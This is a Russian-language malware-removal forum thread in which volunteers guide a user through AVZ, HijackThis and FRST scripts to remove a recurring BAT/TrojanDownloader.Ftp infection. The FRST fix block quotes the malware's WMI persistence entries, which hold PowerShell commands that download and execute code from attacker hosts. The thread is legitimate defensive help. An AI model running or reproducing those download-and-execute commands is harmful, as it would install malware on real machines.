Решена BAT/TrojanDownloader.Ftp что это и как удалить с компьютера

[needinfinity]

ESET Online Scaner обнаружил 2 файла BAT/TrojanDownloader.Ftp Windows/System32/p и Windows/System32/ps
После того как утилита удаляет эти файлы, они снова появляются. Помогите как это удалить..

 

[needinfinity]

ESET последний раз сканировал вчера, нашел снова эти файлы и удалил. Возможно, в логах вирусов не найдется т.к они еще не появились. ( я не разбираюсь в этом )

 

[akok]

На какие файлы ругается антивирус?

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ из папки Autologger (Файл - Выполнить скрипт):

  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Programdata\RealtekHD\taskhostw.exe','');
 QuarantineFile('C:\Programdata\RealtekHD\taskhost.exe','');
 DeleteFile('C:\Programdata\RealtekHD\taskhost.exe','64');
 DeleteFile('C:\Programdata\RealtekHD\taskhostw.exe','64');
 DeleteSchedulerTask('Microsoft\Windows\Wininet\RealtekHDControl');
 DeleteSchedulerTask('Microsoft\Windows\Wininet\RealtekHDStartUP');
 DeleteSchedulerTask('Microsoft\Windows\Wininet\Taskhost');
 DeleteSchedulerTask('Microsoft\Windows\Wininet\Taskhostw');
ClearHostsFile;
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.

Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.

Файл quarantine.7z из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{166EB408-AB10-4916-AB2F-5E77325D328C} - \Yandex.Stroka.User.S-1-5-21-306002614-2138405325-3491090883-1001 (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5EE0BE42-EA97-43EE-96C6-1E10C0C11379} - \AdobeUpdateFlac (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ED1EC8AF-9A69-4F37-AA13-FD18513E09C7} - \AdobeUpdateFlac2 (no xml)

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".

 

[needinfinity]

появился архив quarantine.7z с пустой папкой, все равно отправить этот файл? Строки пофиксил.
На какие файлы ругается антивирус? Этого я не понял, прошел быстро процесс через первый скрипт и компьютер перезагрузился. Во время второго скрипта тоже ничего не было.

После повторной диагностики

 

[akok]

Если пустая, то не нужно отправлять.

На какие файлы ругается антивирус?

Он самый, можно посмотреть в файлах журнала антивируса.

 

[needinfinity]

У меня на компьютере не установлен антивирус. Или мне снова запустить сканирование ESET?

 

[akok]

нет, запускать не нужно. Можно посмотреть так (пункт 11 или 15).

[KB405] ESET Online Scanner FAQ

support.eset.com

Если не получилось, то не стоит тратить свое время.


++++
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да (Yes) для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.

 

[needinfinity]

Все таки не получилось открыть журнал. У меня обычная версия ESET scanner и я могу открыть журнал, в котором инфа только об последнем сканировании ( который я делал сегодня, но отменил его ). А чтобы открыть открыть инфу о прошлых сканированиях нужна полная версия ESET Internet Security. Но опять таки, возможно я не правильно понял ).

Файлы после сканирования:

 

[Sandor]

Дополнительно, пожалуйста:
Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV_br.exe
В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению.

После перезагрузки системы удалите старые и соберите новые логи FRST.txt и Addition.txt

 

[needinfinity]

Готово.

 

[akok]

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

• Отключите до перезагрузки антивирус.
• Выделите следующий код:
  

  Start::
  SystemRestore: On
  CreateRestorePoint:
  LM-x32\...\Run: [] => [X]
  HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
  GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
  GroupPolicy\User: Ограничение ? <==== ВНИМАНИЕ
  Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
  WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"bacru4\"",Filter="__EventFilter.Name=\"bacru3\"::
  WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"tosa4\"",Filter="__EventFilter.Name=\"tosa3\"::
  WMI:subscription\__EventFilter->bacru3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
  WMI:subscription\__EventFilter->tosa3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10500 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
  WMI:subscription\CommandLineEventConsumer->bacru4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.oopmus.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://bec.rocop.ru:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://oo (запись имеет ещё 358 символов).]
  WMI:subscription\CommandLineEventConsumer->tosa4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.webpublicservices.org:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadStri (запись имеет ещё 410 символов).]
  AlternateDataStreams: C:\Users\Максим\Application Data:bc6be3eabffaddc099151eee7bdd94ee [394]
  AlternateDataStreams: C:\Users\Максим\AppData\Roaming:bc6be3eabffaddc099151eee7bdd94ee [394]
  FirewallRules: [{F35952D5-BA27-4D6B-B87C-6D0A00A0988F}] => (Allow) C:\Users\Максим\AppData\Roaming\DRPSu\Alice\cloud.exe => Нет файла
  FirewallRules: [{B9B739E6-6226-4B5D-B16C-341F669768C3}] => (Allow) C:\Users\Максим\AppData\Roaming\DRPSu\Alice\cloud.exe => Нет файла
  FirewallRules: [{86C62C5E-175D-43BE-9EA3-3C3E73D76F1F}] => (Allow) C:\Users\Максим\AppData\Roaming\DRPSu\Alice\cloud.exe => Нет файла
  FirewallRules: [{9F446B59-B091-4B78-B4F4-CCC22C82D184}] => (Allow) C:\Users\Максим\AppData\Roaming\DRPSu\Alice\cloud.exe => Нет файла
  FirewallRules: [{9F645E99-E060-46C7-8350-E8C904A3BCE8}] => (Allow) C:\Users\Максим\AppData\Roaming\DRPSu\Alice\cloud.exe => Нет файла
  FirewallRules: [{9C4FB3C7-85AC-4E5E-9B8F-E824CC462E90}] => (Allow) C:\Users\Максим\AppData\Roaming\DRPSu\Alice\cloud.exe => Нет файла
  FirewallRules: [{2F6740C3-703C-45DA-9F40-0F2B48BD3065}] => (Allow) C:\Users\Максим\AppData\Roaming\uTorrent\uTorrent.exe => Нет файла
  FirewallRules: [{B1CD9C05-4567-4A48-BB3B-4AB8295F983A}] => (Allow) C:\Users\Максим\AppData\Roaming\uTorrent\uTorrent.exe => Нет файла
  FirewallRules: [TCP Query User{56D8F0F0-7147-4F94-9D2C-B8866688389C}C:\program files (x86)\origin games\fifa 20\fifa20.exe] => (Allow) C:\program files (x86)\origin games\fifa 20\fifa20.exe => Нет файла
  FirewallRules: [UDP Query User{9F4E707D-0286-4A95-A604-45F1A819BF77}C:\program files (x86)\origin games\fifa 20\fifa20.exe] => (Allow) C:\program files (x86)\origin games\fifa 20\fifa20.exe => Нет файла
  FirewallRules: [TCP Query User{E4BBD57B-5DF7-47C5-B0B4-5248A4067C60}C:\program files (x86)\windscribe\wsappcontrol.exe] => (Allow) C:\program files (x86)\windscribe\wsappcontrol.exe => Нет файла
  FirewallRules: [UDP Query User{1C41EFF1-2FD7-4B9F-87B6-099592C5CC71}C:\program files (x86)\windscribe\wsappcontrol.exe] => (Allow) C:\program files (x86)\windscribe\wsappcontrol.exe => Нет файл
  FirewallRules: [{1AC48C3D-088A-4392-9F8C-9DB7B4593B05}] => (Allow) C:\Users\Максим\AppData\Local\Programs\Opera\77.0.4054.277\opera.exe => Нет файла
  FirewallRules: [TCP Query User{45227272-F8F9-4759-A647-8B369A27859C}C:\farming simulator 22\x64\farmingsimulator2022game.exe] => (Allow) C:\farming simulator 22\x64\farmingsimulator2022game.exe => Нет файла
  FirewallRules: [UDP Query User{1F1A45B7-B104-4D00-8861-96B4BCEE898F}C:\farming simulator 22\x64\farmingsimulator2022game.exe] => (Allow) C:\farming simulator 22\x64\farmingsimulator2022game.exe => Нет файла
  FirewallRules: [TCP Query User{D4327131-BEB0-4B65-8FA2-20ACBC647410}C:\users\максим\downloads\core keeper\corekeeper.exe] => (Allow) C:\users\максим\downloads\core keeper\corekeeper.exe => Нет файла
  FirewallRules: [UDP Query User{8E2C46A4-4FA3-4857-95AC-34BF9AFBA84D}C:\users\максим\downloads\core keeper\corekeeper.exe] => (Allow) C:\users\максим\downloads\core keeper\corekeeper.exe => Нет файла
  FirewallRules: [TCP Query User{040D8804-3BF7-4B1B-89E1-CBDD555830BD}C:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) C:\program files (x86)\hearthstone\hearthstone.exe => Нет файла
  FirewallRules: [UDP Query User{DC104657-157C-473E-B89B-C6850D7B1DF4}C:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) C:\program files (x86)\hearthstone\hearthstone.exe => Нет файла
  FirewallRules: [{D9123B32-772D-449F-8812-9455CC19889A}] => (Allow) C:\Users\Максим\AppData\Local\Programs\Opera\85.0.4341.60\opera.exe => Нет файла
  FirewallRules: [{8b3fac1e-d21f-462a-bfc9-da2491a453c8}] => (Allow) C:\Program Files\ldplayerbox\LdVBoxHeadless.exe => Нет файла
  FirewallRules: [{1633F955-73F1-46E4-9DD1-0F5497C2E2F0}] => (Allow) C:\Program Files (x86)\Bignox\BigNoxVM\RT\NoxVMHandle.exe => Нет файла
  EmptyTemp:
  Reboot:
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

[needinfinity]

Если что, я случайно в первый раз нажал fix до того как создал файл со скриптом и сразу прервал процесс.

 

[Sandor]

Файл со скриптом и не нужно было создавать

Что сейчас с проблемой?

 

[needinfinity]

Сейчас я не могу ответить. Просканировать ESET заново, что бы получить ответ?

 

[Sandor]

Да, пожалуйста.

 

[needinfinity]

Да, пожалуйста.

Хорошо, тогда я отвечу приблизительно через 2.30 часа

 

[needinfinity]

Да, пожалуйста.

К сожалению не помогло. Прикрепил журнал сканирования

 

[needinfinity]

Что можно еще сделать?

 

[akok]

Сделайте новое сканирование FRST. Мы удалили ту часть вредоноса, что распространяла заразу +++ когда будете запускать сканирование поставьте галочку напротив "показывать файлы за 90 дней".

 

[needinfinity]

Сделал